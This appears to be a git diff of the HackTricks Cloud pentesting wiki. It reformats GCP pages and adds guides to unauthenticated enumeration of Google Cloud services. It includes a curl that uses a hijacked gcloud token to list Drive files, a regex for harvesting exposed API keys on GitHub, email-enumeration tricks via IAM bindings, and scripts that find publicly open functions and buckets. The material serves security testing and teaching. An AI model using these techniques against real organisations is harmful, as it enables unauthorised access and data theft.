-{% hint style="warning" %} -Therefore, the next time the user logs in he will create a **token with access to drive** that the attacker could abuse to access the drive. Obviously, the browser will indicate that the generated token will have access to drive, but as the user will call himself the **`gcloud auth login`**, he probably **won't suspect anything.** - -To list drive files: **`curl -H "Authorization: Bearer $(gcloud auth print-access-token)" "https://www.googleapis.com/drive/v3/files"`** -{% endhint %} +> [!WARNING] +> Therefore, the next time the user logs in he will create a **token with access to drive** that the attacker could abuse to access the drive. Obviously, the browser will indicate that the generated token will have access to drive, but as the user will call himself the **`gcloud auth login`**, he probably **won't suspect anything.** +> +> To list drive files: **`curl -H "Authorization: Bearer $(gcloud auth print-access-token)" "https://www.googleapis.com/drive/v3/files"`** ## From GWS to GCP 
@@ -185,19 +166,6 @@ Abusing the **google groups privesc** you might be able to escalate to a group w ### References -* [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover) +- [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md similarity index 56% rename from pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md rename to src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md index ace16c046..0f33fecee 100644 --- a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md +++ b/src/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md @@ -1,19 +1,6 @@ # GCP - Understanding Domain-Wide Delegation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} This post is the introduction of [https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover](https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover) which can be accessed for more details. @@ -23,14 +10,14 @@ Google Workspace's Domain-Wide delegation allows an identity object, either an * \ Google Workspace allows the creation of two main types of global delegated object identities: -* **GWS Applications:** Applications from the Workspace Marketplace can be set up as a delegated identity. Before being made available in the marketplace, each Workspace application undergoes a review by Google to minimize potential misuse. While this does not entirely eliminate the risk of abuse, it significantly increases the difficulty for such incidents to occur. -* **GCP Service Account:** Learn more about [**GCP Service Accounts here**](../gcp-basic-information/#service-accounts). +- **GWS Applications:** Applications from the Workspace Marketplace can be set up as a delegated identity. Before being made available in the marketplace, each Workspace application undergoes a review by Google to minimize potential misuse. While this does not entirely eliminate the risk of abuse, it significantly increases the difficulty for such incidents to occur. +- **GCP Service Account:** Learn more about [**GCP Service Accounts here**](../gcp-basic-information/#service-accounts). ### **Domain-Wide Delegation: Under the Hood** This is how a GCP Service Account can access Google APIs on behalf of other identities in Google Workspace: -
+
1. **Identity creates a JWT:** The Identity uses the service account's private key (part of the JSON key pair file) to sign a JWT. This JWT contains claims about the service account, the target user to impersonate, and the OAuth scopes of access to the REST API which is being requested. 2. **The Identity uses the JWT to request an access token:** The application/user uses the JWT to request an access token from Google's OAuth 2.0 service. The request also includes the target user to impersonate (the user's Workspace email), and the scopes for which access is requested. @@ -38,17 +25,4 @@ This is how a GCP Service Account can access Google APIs on behalf of other iden 4. **The Identity uses the access token to call Google APIs**: Now with a relevant access token, the service can access the required REST API. The application uses this access token in the "Authorization" header of its HTTP requests destined for Google APIs. These APIs utilize the token to verify the impersonated identity and confirm it has the necessary authorization. 5. **Google APIs return the requested data**: If the access token is valid and the service account has appropriate authorization, the Google APIs return the requested data. For example, in the following picture, we’ve leveraged the _users.messages.list_ method to list all the Gmail message IDs associated with a target Workspace user. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
new file mode 100644
index 000000000..8dd74fae5
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md
@@ -0,0 +1,18 @@
+# GCP - Unauthenticated Enum & Access
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Public Assets Discovery
+
+One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
+
+Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**.
+
+## Public Resources Brute-Force
+
+### Buckets, Firebase, Apps & Cloud Functions
+
+- [https://github.com/initstring/cloud_enum](https://github.com/initstring/cloud_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
+- [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
new file mode 100644
index 000000000..c2e81cd6c
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
@@ -0,0 +1,52 @@ +# GCP - API Keys Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## API Keys + +For more information about API Keys check: + +{{#ref}} +../gcp-services/gcp-api-keys-enum.md +{{#endref}} + +### OSINT techniques + +**Google API Keys are widely used by any kind of applications** that uses from the client side. It's common to find them in for websites source code or network requests, in mobile applications or just searching for regexes in platforms like Github. + +The regex is: **`AIza[0-9A-Za-z_-]{35}`** + +Search it for example in Github following: [https://github.com/search?q=%2FAIza%5B0-9A-Za-z\_-%5D%7B35%7D%2F\&type=code\&ref=advsearch](https://github.com/search?q=%2FAIza%5B0-9A-Za-z_-%5D%7B35%7D%2F&type=code&ref=advsearch) + +### Check origin GCP project - `apikeys.keys.lookup` + +This is extremely useful to check to **which GCP project an API key that you have found belongs to**: + +```bash +# If you have permissions +gcloud services api-keys lookup AIzaSyD[...]uE8Y +name: projects/5[...]6/locations/global/keys/28d[...]e0e +parent: projects/5[...]6/locations/global + +# If you don't, you can still see the project ID in the error msg +gcloud services api-keys lookup AIzaSy[...]Qbkd_oYE +ERROR: (gcloud.services.api-keys.lookup) PERMISSION_DENIED: Permission 'apikeys.keys.lookup' denied on resource project. 
+Help Token: ARD_zUaNgNilGTg9oYUnMhfa3foMvL7qspRpBJ-YZog8RLbTjCTBolt_WjQQ3myTaOqu4VnPc5IbA6JrQN83CkGH6nNLum6wS4j1HF_7HiCUBHVN +- '@type': type.googleapis.com/google.rpc.PreconditionFailure + violations: + - subject: ?error_code=110002&service=cloudresourcemanager.googleapis.com&permission=serviceusage.apiKeys.getProjectForKey&resource=projects/89123452509 + type: googleapis.com +- '@type': type.googleapis.com/google.rpc.ErrorInfo + domain: apikeys.googleapis.com + metadata: + permission: serviceusage.apiKeys.getProjectForKey + resource: projects/89123452509 + service: cloudresourcemanager.googleapis.com + reason: AUTH_PERMISSION_DENIED +``` + +### Brute Force API endspoints + +As you might not know which APIs are enabled in the project, it would be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md new file mode 100644 index 000000000..52d1c8097 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md 
@@ -0,0 +1,25 @@
+# GCP - App Engine Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Engine
+
+For more information about App Engine check:
+
+{{#ref}}
+../gcp-services/gcp-app-engine-enum.md
+{{#endref}}
+
+### Brute Force Subdomains
+
+As mentioned the URL assigned to App Engine web pages is **`.appspot.com`** and if a service name is used it'll be: **`-dot-.appspot.com`**.
+
+As the **`project-uniq-name`** can be set by the person creating the project, they might be not that random and **brute-forcing them could find App Engine web apps exposed by companies**.
+
+You could use tools like the ones indicated in:
+
+{{#ref}}
+./
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
new file mode 100644
index 000000000..0fd2f5639
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
@@ -0,0 +1,21 @@
+# GCP - Artifact Registry Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{{#ref}}
+../gcp-services/gcp-artifact-registry-enum.md
+{{#endref}}
+
+### Dependency Confusion
+
+Check the following page:
+
+{{#ref}}
+../gcp-persistence/gcp-artifact-registry-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
new file mode 100644
index 000000000..62964c53a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md @@ -0,0 +1,42 @@ +# GCP - Cloud Build Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Build + +For more information about Cloud Build check: + +{{#ref}} +../gcp-services/gcp-cloud-build-enum.md +{{#endref}} + +### cloudbuild.yml + +If you compromise write access over a repository containing a file named **`cloudbuild.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a Cloud Build and exfiltrate the secrets, compromise what is done and also compromise the **Cloud Build service account.** + +> [!NOTE] +> Note that GCP has the option to allow administrators to control the execution of build systems from external PRs via "Comment Control". Comment Control is a feature where collaborators/project owners **need to comment “/gcbrun” to trigger the build** against the PR and using this feature inherently prevents anyone on the internet from triggering your build systems. + +For some related information you could check the page about how to attack Github Actions (similar to this): + +{{#ref}} +../../../pentesting-ci-cd/github-security/abusing-github-actions/ +{{#endref}} + +### PR Approvals + +When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. + +
+
+> [!CAUTION]
+> Therefore, is this is set to **`Not required`**, an attacker could perform a **PR to the branch** that will trigger the execution adding the malicious code execution to the **`cloudbuild.yml`** file and compromise the cloudbuild execution (note that cloudbuild will download the code FROM the PR, so it will execute the malicious **`cloudbuild.yml`**).
+
+Moreover, it's easy to see if some cloudbuild execution needs to be performed when you send a PR because it appears in Github:
+
+
+> [!WARNING]
+> Then, even if the cloudbuild is not executed the attacker will be able to see the **project name of a GCP project** that belongs to the company.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
new file mode 100644
index 000000000..c8730c80a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
@@ -0,0 +1,77 @@ +# GCP - Cloud Functions Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Functions + +More information about Cloud Functions can be found in: + +{{#ref}} +../gcp-services/gcp-cloud-functions-enum.md +{{#endref}} + +### Brute Force URls + +**Brute Force the URL format**: + +- `https://-.cloudfunctions.net/` + +It's easier if you know project names. + +Check this page for some tools to perform this brute force: + +{{#ref}} +./ +{{#endref}} + +### Enumerate Open Cloud Functions + +With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. + +```bash +#!/bin/bash + +############################ +# Run this tool to find Cloud Functions that permit unauthenticated invocations +# anywhere in your GCP organization. +# Enjoy! +############################ + +for proj in $(gcloud projects list --format="get(projectId)"); do + echo "[*] scraping project $proj" + + enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API") + + if [ -z "$enabled" ]; then + continue + fi + + + for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do + # drop substring from first occurence of "," to end of string. + func="${func_region%%,*}" + # drop substring from start of string up to last occurence of "," + region="${func_region##*,}" + ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")" + + all_users="$(echo "$ACL" | grep allUsers)" + all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)" + + if [ -z "$all_users" ] + then + : + else + echo "[!] Open to all users: $proj: $func" + fi + + if [ -z "$all_auth" ] + then + : + else + echo "[!] 
Open to all authenticated users: $proj: $func" + fi + done +done +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md new file mode 100644 index 000000000..71808873c --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md 
@@ -0,0 +1,59 @@ +# GCP - Cloud Run Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Run + +For more information about Cloud Run check: + +{{#ref}} +../gcp-services/gcp-cloud-run-enum.md +{{#endref}} + +### Enumerate Open Cloud Run + +With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. + +```bash +#!/bin/bash + +############################ +# Run this tool to find Cloud Run services that permit unauthenticated +# invocations anywhere in your GCP organization. +# Enjoy! +############################ + +for proj in $(gcloud projects list --format="get(projectId)"); do + echo "[*] scraping project $proj" + + enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API") + + if [ -z "$enabled" ]; then + continue + fi + + + for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do + ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)" + + all_users="$(echo $ACL | grep allUsers)" + all_auth="$(echo $ACL | grep allAuthenticatedUsers)" + + if [ -z "$all_users" ] + then + : + else + echo "[!] Open to all users: $proj: $run" + fi + + if [ -z "$all_auth" ] + then + : + else + echo "[!] Open to all authenticated users: $proj: $run" + fi + done +done +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md new file mode 100644 index 000000000..f123b614e --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md 
@@ -0,0 +1,25 @@
+# GCP - Cloud SQL Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud SQL
+
+For more infromation about Cloud SQL check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-sql-enum.md
+{{#endref}}
+
+### Brute Force
+
+If you have **access to a Cloud SQL port** because all internet is permitted or for any other reason, you can try to brute force credentials.
+
+Check this page for **different tools to burte-force** different database technologies:
+
+{{#ref}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force
+{{#endref}}
+
+Remember that with some privileges it's possible to **list all the database users** via GCP API.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
new file mode 100644
index 000000000..102399e83
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
@@ -0,0 +1,25 @@
+# GCP - Compute Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Compute
+
+For more information about Compute and VPC (Networking) check:
+
+{{#ref}}
+../gcp-services/gcp-compute-instances-enum/
+{{#endref}}
+
+### SSRF - Server Side Request Forgery
+
+If a web is **vulnerable to SSRF** and it's possible to **add the metadata header**, an attacker could abuse it to access the SA OAuth token from the metadata endpoint. For more info about SSRF check:
+
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
+{{#endref}}
+
+### Vulnerable exposed services
+
+If a GCP instance has a vulnerable exposed service an attacker could abuse it to compromise it.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md similarity index 65% rename from pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md rename to src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md index 7890c3301..7de36faff 100644 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md @@ -1,27 +1,14 @@ # GCP - IAM, Principals & Org Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Iam & GCP Principals For more information check: -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-iam-and-org-policies-enum.md +{{#endref}} ### Is domain used in Workspace? @@ -46,7 +33,7 @@ Another option is to try to setup a Workspace using the domain, if it **complain To try to setup a Workspace domain follow: [https://workspace.google.com/business/signup/welcome](https://workspace.google.com/business/signup/welcome) -
+
3. **Try to recover the password of an email using that domain** @@ -58,7 +45,6 @@ It's possible to **enumerate valid emails of a Workspace domain and SA emails** Note that to check them but even if they exist not grant them a permission you can use the type **`serviceAccount`** when it's an **`user`** and **`user`** when it's a **`SA`**: -{% code overflow="wrap" %} ```bash # Try to assign permissions to user 'unvalid-email-34r434f@hacktricks.xyz' # but indicating it's a service account @@ -75,7 +61,6 @@ gcloud projects add-iam-policy-binding \ # Response: ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: Principal support@hacktricks.xyz is of type "user". The principal should appear as "user:support@hacktricks.xyz". See https://cloud.google.com/iam/help/members/types for additional documentation. ``` -{% endcode %} A faster way to enumerate Service Accounts in know projects is just to try to access to the URL: `https://iam.googleapis.com/v1/projects//serviceAccounts/`\ For examlpe: `https://iam.googleapis.com/v1/projects/gcp-labs-3uis1xlx/serviceAccounts/appengine-lab-1-tarsget@gcp-labs-3uis1xlx.iam.gserviceaccount.com` @@ -106,7 +91,6 @@ Note how when the user email was valid the error message indicated that they typ You can so the **same with Service Accounts** using the type **`user:`** instead of **`serviceAccount:`**: -{% code overflow="wrap" %} ```bash # Non existent gcloud projects add-iam-policy-binding \ 
@@ -122,19 +106,5 @@ gcloud projects add-iam-policy-binding \ # Response ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: Principal testing@digital-bonfire-410512.iam.gserviceaccount.com is of type "serviceAccount". The principal should appear as "serviceAccount:testing@digital-bonfire-410512.iam.gserviceaccount.com". See https://cloud.google.com/iam/help/members/types for additional documentation. ``` -{% endcode %} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
new file mode 100644
index 000000000..26918ddb9
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
@@ -0,0 +1,20 @@
+# GCP - Source Repositories Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Source Repositories
+
+For more information about Source Repositories check:
+
+{{#ref}}
+../gcp-services/gcp-source-repositories-enum.md
+{{#endref}}
+
+### Compromise External Repository
+
+If an external repository is being used via Source Repositories an attacker could add his malicious code to the repository and:
+
+- If someone uses Cloud Shell to develop the repository it could be compromised
+- if this source repository is used by other GCP services, they could get compromised
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
new file mode 100644
index 000000000..848b2d0ba
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md
@@ -0,0 +1,73 @@ +# GCP - Storage Unauthenticated Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Storage + +For more information about Storage check: + +{{#ref}} +../../gcp-services/gcp-storage-enum.md +{{#endref}} + +### Public Bucket Brute Force + +The **format of an URL** to access a bucket is **`https://storage.googleapis.com/`.** + +The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: + +- [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) + +**Also the tools** mentioned in: + +{{#ref}} +../ +{{#endref}} + +If you find that you can **access a bucket** you might be able to **escalate even further**, check: + +{{#ref}} +gcp-public-buckets-privilege-escalation.md +{{#endref}} + +### Search Open Buckets in Current Account + +With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_buckets.sh) you can find all the open buckets: + +```bash +#!/bin/bash + +############################ +# Run this tool to find buckets that are open to the public anywhere +# in your GCP organization. +# +# Enjoy! +############################ + +for proj in $(gcloud projects list --format="get(projectId)"); do + echo "[*] scraping project $proj" + for bucket in $(gsutil ls -p $proj); do + echo " $bucket" + ACL="$(gsutil iam get $bucket)" + + all_users="$(echo $ACL | grep allUsers)" + all_auth="$(echo $ACL | grep allAuthenticatedUsers)" + + if [ -z "$all_users" ] + then + : + else + echo "[!] Open to all users: $bucket" + fi + + if [ -z "$all_auth" ] + then + : + else + echo "[!] Open to all authenticated users: $bucket" + fi + done +done +``` + +{{#include ../../../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md new file mode 100644 index 000000000..2d9f1e2c0 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md 
@@ -0,0 +1,31 @@
+# GCP - Public Buckets Privilege Escalation
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Buckets Privilege Escalation
+
+If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access.
+
+### Check Permissions
+
+There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
+
+However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work.
+
+The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
+
+### Escalating
+
